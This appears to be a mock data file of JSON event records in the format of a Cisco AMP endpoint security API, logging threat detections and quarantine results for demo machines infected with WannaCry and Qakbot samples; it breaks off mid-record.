+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":399000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662859016176000,"timestamp":1610651432,"timestamp_nanoseconds":199000000,"date":"2021-01-14T19:10:32+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662854721208000,"timestamp":1610651431,"timestamp_nanoseconds":856000000,"date":"2021-01-14T19:10:31+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":233000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":396000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":927000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"igvj$vN.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"6951045.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"99fffe78e0cbd7b508eed13a8633903dd89ed5f1","md5":"dc41e47ebba549ec5e616ed9e88a0376"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 